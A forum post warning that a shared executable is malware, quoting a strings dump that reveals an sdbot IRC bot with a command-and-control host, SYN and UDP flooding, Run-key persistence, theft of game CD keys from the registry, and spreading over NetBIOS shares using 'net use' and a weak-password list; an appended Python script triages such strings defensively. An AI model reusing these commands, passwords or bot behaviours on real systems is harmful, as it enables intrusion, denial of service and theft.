Hey all,
I have looked at the exe, and what it seems to do is look for the serials of a few games and connect to IRC. Moderators/Admins, I suggest you delete this topic.
Take a look at the code I extracted from the exe below:
code:
ScanNetBIOS GetLocalIP GetCmdIP GetNextIP GetRandIP
EnumShare TermProcess hack3r wingiz ddos.no-ip.info #s0t lol irc.gamesnet.net #s0t
wupdated.exe Configuration Loaded .* .
WinMain checksum LookupAddress
SendSyn SYNFlood decryptstr addlog addalias addthread irc_connect ident rndnick irc_receiveloop
irc_parseline irc_spyparseline irc_send irc_sendf irc_sendf2 irc_privmsg replacestr udp ping
webdownload redirect redirectloop redirectloop2 netinfo sysinfo cpuspeed cyclecount visit uninstall
synthread Done with SYN flood [%iKB/sec]
%%comspec%% /c %s %s @echo off
tart
if not exist ""%1"" goto done
del /F ""%1""
del ""%1""
goto start
one
del /F %temp%
.bat
del %temp%
.bat
%s\r.bat url visited. invalid URL. error visiting URL. */*
! & 2 7
B G K P d @B cpu: %dMHz. ram: %dMB total, %dMB free. os: Windows %s (%d.%d,
build %d). uptime: %dd %dh %dm. box: %s. user: %s. %s [%s] ??? XP 2000 ME 98 NT 95 connection type: %s (%s). local
IP address: %d.%d.%d.%d. connected from: %s N/A LAN dial-up bad url, or dns error. update failed: error executing
file. downloaded %.1f kb to %s @ %.1f kb/sec. updating... PRIVMSG %s pened %s.
@downloaded %.1f kb to %s @ %.1f kb/sec. update (%s - %dkb transferred) file download (%s - %dkb
transferred) PRIVMSG %s :couldn't open %s.
PRIVMSG %s :finished sending pings to %s.
PRIVMSG %s :error sending pings to %s.
PRIVMSG %s :finished sending packets to %s.
PRIVMSG %s :error sending packets to %s.
%s%s %s%s%s %s %s :%s
%s
[%s]: <%s> %s [%s]: * %s %s ACTION ACTION [%s]: %s sets mode: %s MODE [%s]: %s is now known as %s. [%s]: %s has
quit(%s). wtf %s?
[%s]: %s has left %s. [%s]: %s has joined %s. JOIN [%s]: nick %s already in use. 433 [%s]: Users in %s: %s spy
created on %s:%d, in channel %s.
spy (%s) sp spy icmp.dll not available sending %d pings to %s. packet size: %d, timeout: %d[ms]
ping (%s) p ping sending %d udp packets to: %s. packet size: %d, delay: %d[ms].
udp (%s) u udp [%s] * %s %s c_a c_action [%s] <%s> %s c_pm c_privmsg redirect created on port %d to %s:%d.
redirect (%d->%s:%d) rd redirect downloading %s...
download (%s) dl download clone created on %s:%d, in channel %s.
clone (%s) c clone SYN flooding [%s:%s] for %s seconds
syn couldn't execute file. e execute downloading update from %s...
update (%s) %s\%s.exe up update de delay PART %s c_p c_part JOIN %s %s c_j c_join c_n c_nick MODE %s c_m c_mode
c_r c_raw %s %s %s :%s rp repeat MODE %s
m mode cy cycle ACTION %s a action pm privmsg aa addalias v visit couldn't resolve host %s -> %s dn dns se
couldn't open file. file opened. o open pr prefix NICK %s c_rn c_rndnick c_q c_quit thread(s) killed. k killthread
raw PART %s
pt part j join n nick removing bot... rm remove si sysinfo ni netinfo lg log %d. %s = %s -[alias list]- al aliases
%d. %s -[thread list]- t threads sdbot 0.5b with SYN flood by [sd] ab about i id sdbot 0.5b with SYN flood ready.
Up %dd %dh %dm. s status QUIT :%s
QUIT :later
q quit QUIT :later disconnect QUIT :reconnecting reconnect user %s logged out.
lo logout d die Found Tiberian Sun CDKey (%s).
Software\Westwood\Tiberian Sun Found Red Alert 2 CDKey (%s).
Serial Software\Westwood\Red Alert 2 Software\IGI 2 Retail\CDKey Found Command & Conquer Generals CDKey (%s).
Software\Electronic Arts\EA GAMES\Generals\ergc Found FIFA 2003 CDKey (%s).
Software\Electronic Arts\EA Sports\FIFA 2003\ergc Found NFSHP2 CDKey (%s).
Software\Electronic Arts\EA GAMES\Need For Speed Hot Pursuit 2\ergc Found The Gladiators CDKey (%s).
RegNumber Software\Eugen Systems\The Gladiators Found SOF2 CDKey (%s).
mtkwftmkemfew3p3b7 sof2key %s\base\mp\%s InstallPath Software\Activision\Soldier of Fortune II - Double Helix
Found NWN CDKey %s.
= Key1= r nwncdkey.ini %s\%s Location Software\BioWare\NWN\Neverwinter Rainbow Six III RavenShield CDKey (%s).
SOFTWARE\Red Storm Entertainment\RAVENSHIELD Found Battlefield 1942 Road To Rome CDKey (%s).
SOFTWARE\Electronic Arts\EA GAMES\Battlefield 1942 The Road to Rome Found Battlefield 1942 CDKey (%s).
ergc SOFTWARE\Electronic Arts\EA GAMES\Battlefield 1942 Found Project IGI 2 CDKey (%s).
SOFTWARE\IGI 2 Retail Found Counter-Strike ( Retail ) CDKey (%s).
Software\Valve\CounterStrike\Settings Found Unreal Tournament 2003 CDKey (%s).
CDKey Software\Unreal Technology\Installed Apps\UT2003 Found Half-Life CDKey (%s).
Key Software\Valve\Half-Life\Settings cdkey getcdkey NICK %s
rn rndnick 63 ) $chr( $server $rndnick $chan $user $me $%d $%d- user %s(%s) logged in. password accepted. l
login NOTICE %s :PING %s
PING NOTICE %s :VERSION %s
VERSION # 332 PRIVMSG joined channel %s. 353 QUIT PART NICK screw you %s! NOTICE %s :%s
user %s logged out. KICK @ 302 USERHOST %s
005 001 pong NOTICE JOIN %s %s
PONG %s
jamesbrown WHOIS %s
PING ! -s :
NICK %s
USER %s 0 0 :%s
PASS %s
%d, %d : USERID : UNIX : %s
connected to %s. [%d-%d-%d %d:%d:%d] %s syn flood: %s:%s [%iKB/sec] send error!:%d
Error: Cannot initalize
winsock. bot started. raw PRIVMSG $1 chr(1)$2-$chr(1) ctcp syn $1 80 60 s1 ping $1 10000 $2 50 p2 udp $1 10000
2048 50 u1 action $chan smacks $1 smack mode $chan +o $user opme main thread
Software\Microsoft\Windows\CurrentVersion\RunServices Software\Microsoft\Windows\CurrentVersion\Run \%s
InternetGetConnectedStateEx InternetGetConnectedState WININET.DLL Mozilla/4.0 (compatible) Process32Next Process32
First CreateToolhelp32Snapshot RegisterServiceProcess kernel32.dll IcmpSendEcho IcmpCloseHandle IcmpCreateFile
ICMP.DLL C:\ %S \IPC$ . %s net use * "%s" "%s" /user:"%s"
net use * "%s" "%s" /user:""
net use * "%s" "" /user:""
\
\\ [SCANNING] Address: %s Port: 139
!@#$%^&* !@#$%^& !@#$%^ !@#$% !@#$ 654321 123456 1234 123 111 1 server
secret password password123 pass pass123 hidden asdfgh asdf wwwadmin user system sqlagent sql root owner guest
database administrator admin wedit.exe -p %d lcc runtime: GP fault. Stack trace Current instruction: 0
x%x
Fault occurred outside a function scope
...
Corrupted stack. Impossible to show trace
unknown
%3d %s [%s]
%s %s %d
%d after unknown line
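
Added example, not part of the original post and not code from the binary: a small Python triage that pulls printable strings out of a byte blob the way `strings` does and groups them by the behaviours visible in the dump above (IRC control, autostart keys, CD-key lookups, share access, flooding). The rule labels, function names and the sample blob are constructed for illustration; the sample reuses a few strings from the dump.

```python
import re

# Behaviour label -> pattern. Labels are this example's own; the patterns are
# written against strings that appear in the dump above.
RULES = {
    "irc_c2": re.compile(r"\b(PRIVMSG|NICK|JOIN|PONG)\b|irc[_.]", re.I),
    "persistence": re.compile(r"CurrentVersion\\Run(Services)?\b", re.I),
    "cdkey_theft": re.compile(
        r"cd\s?key|\\ergc\b|Software\\(Westwood|Valve|Electronic Arts)\\", re.I),
    "share_access": re.compile(r"net use |\\IPC\$|Port: 139", re.I),
    "flooding": re.compile(r"syn ?flood|udp packets|sending %d pings", re.I),
}

def extract_strings(data: bytes, min_len: int = 4):
    """Return runs of printable ASCII at least min_len long, like strings(1)."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]

def triage(strings):
    """Map each behaviour label to the strings that matched its pattern."""
    hits = {name: [] for name in RULES}
    for s in strings:
        for name, rx in RULES.items():
            if rx.search(s):
                hits[name].append(s)
    return hits

def summary(data: bytes):
    """Count matching strings per behaviour for a raw byte blob."""
    return {name: len(v) for name, v in triage(extract_strings(data)).items()}

# Constructed sample: strings from the dump, separated by non-printable bytes
# to imitate how they sit inside a binary. "ab" is too short to be extracted.
SAMPLE = b"\x00\x90".join(s.encode("ascii") for s in [
    "irc_connect",
    "PRIVMSG %s :finished sending packets to %s.",
    "irc.gamesnet.net",
    r"Software\Microsoft\Windows\CurrentVersion\RunServices",
    r"Software\Westwood\Red Alert 2",
    "Found Half-Life CDKey (%s).",
    'net use * "%s" "%s" /user:"%s"',
    "SYN flooding [%s:%s] for %s seconds",
    "cpu: %dMHz.",
    "ab",
])

if __name__ == "__main__":
    for label, count in summary(SAMPLE).items():
        print(f"{label:14} {count}")
```

A string that matches no rule (here the `cpu:` format string) is simply not counted, so the output is a starting point for a report, not a verdict on the file.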